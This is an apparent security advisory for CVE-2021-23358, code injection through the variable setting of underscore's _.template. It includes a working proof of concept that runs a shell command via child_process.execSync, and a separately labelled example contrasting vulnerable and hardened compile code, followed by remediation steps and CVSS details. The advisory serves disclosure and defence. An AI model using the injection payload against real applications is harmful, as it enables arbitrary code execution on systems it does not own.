Arbitrary Code Injection

Affecting underscore package, versions >=1.13.0-0 <1.13.0-2 || >=1.3.2 <1.12.1


Overview

underscore is a JavaScript functional programming helper library.

Affected versions of this package are vulnerable to Arbitrary Code Injection via the template function. _.template compiles a template into a function whose parameter name is taken from the variable option (read from _.templateSettings when not passed explicitly), and that string is spliced into the generated function unvalidated. Any JavaScript that is legal in parameter position, such as a default-value expression, is therefore evaluated when the compiled template is called. Applications are exposed when untrusted input can reach _.templateSettings.variable or the variable setting passed to _.template; template text itself is not the injection point here.

PoC

const _ = require('underscore');
// The variable setting becomes the parameter name of the compiled
// template function (new Function(variable, ...)). It is not validated,
// so a default-parameter expression can be smuggled in. The compiled
// function is non-strict, so `this` is the global object and Node's
// process object (and through it child_process) is reachable.
_.templateSettings.variable = "a = this.process.mainModule.require('child_process').execSync('touch HELLO')";
// Calling the compiled template with no arguments evaluates the default
// value, running `touch HELLO` in the current working directory.
const t = _.template("")();
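The following is an added example, not code from this advisory or from the underscore project. It models the compile step behind this issue in miniature: a vulnerable compiler that passes the variable setting straight into new Function, next to a hardened one that first requires the setting to be a bare identifier, which is the kind of check the fixed versions apply. The compileUnsafe and compileSafe functions, the bareIdentifier regex and the marker payload are this example's own inventions; the real library builds a much larger function body from the template text, and the marker replaces the execSync call in the PoC so the effect is observable without side effects.

```javascript
// Minimal model of the template compile step (example code, not
// underscore's own). The library does roughly
//   new Function(settings.variable || 'obj', '_', source)
// and before 1.12.1 did not validate settings.variable.

// Vulnerable model: the parameter name is used as-is.
function compileUnsafe(templateSource, settings) {
  const argument = settings.variable || 'obj';
  // A constant body stands in for the escaped/interpolated template text.
  const source = "return '' + " + JSON.stringify(templateSource) + ";";
  return new Function(argument, source);
}

// Hardened model: only accept a bare identifier (word chars or `$`),
// so nothing other than a parameter name can reach new Function.
// This regex is this example's own, modelled on the fix in 1.12.1.
const bareIdentifier = /^\s*(\w|\$)+\s*$/;

function compileSafe(templateSource, settings) {
  const argument = settings.variable || 'obj';
  if (!bareIdentifier.test(argument)) {
    throw new Error('variable is not a bare identifier: ' + argument);
  }
  const source = "return '' + " + JSON.stringify(templateSource) + ";";
  return new Function(argument, source);
}

// Constructed payload: a default-parameter expression, like the PoC's,
// but it only sets a marker on globalThis instead of spawning a process.
const payload = "a = (globalThis.__template_injected = true)";

// Vulnerable path: compiling succeeds and calling the template with no
// arguments evaluates the default-value expression. Returns true when
// the injected code ran.
function demoUnsafe() {
  delete globalThis.__template_injected;
  const t = compileUnsafe("", { variable: payload });
  t();
  return globalThis.__template_injected === true;
}

// Hardened path: the same payload is rejected at compile time and the
// injected expression never runs. Returns 'rejected', 'injected' or
// 'compiled' to distinguish the three possible outcomes.
function demoSafe() {
  delete globalThis.__template_injected;
  try {
    compileSafe("", { variable: payload });
    return 'compiled';
  } catch (e) {
    return globalThis.__template_injected === true ? 'injected' : 'rejected';
  }
}

// A legitimate identifier still works with the hardened compiler.
function demoSafeLegit() {
  const t = compileSafe("hello", { variable: "data" });
  return t({});
}
```

The check belongs on the parameter name, not on the template text: the PoC compiles an empty template, so filtering template content would not have stopped it.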

Remediation

Upgrade underscore to version 1.13.0-2, 1.12.1 or higher. Until the upgrade is in place, do not allow untrusted input to set _.templateSettings.variable or the variable option passed to _.template.

References

CVSS Score

3.3
low severity
  • Attack Vector
    Network
  • Attack Complexity
    High
  • Privileges Required
    High
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    Low
  • Integrity
    Low
  • Availability
    None
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N/E:P/RL:O/RC:C
Credit
Alessio Della Libera (@d3lla)
CVE
CVE-2021-23358
CWE
CWE-94
Snyk ID
SNYK-JS-UNDERSCORE-1080984
Disclosed
02 Mar, 2021
Published
29 Mar, 2021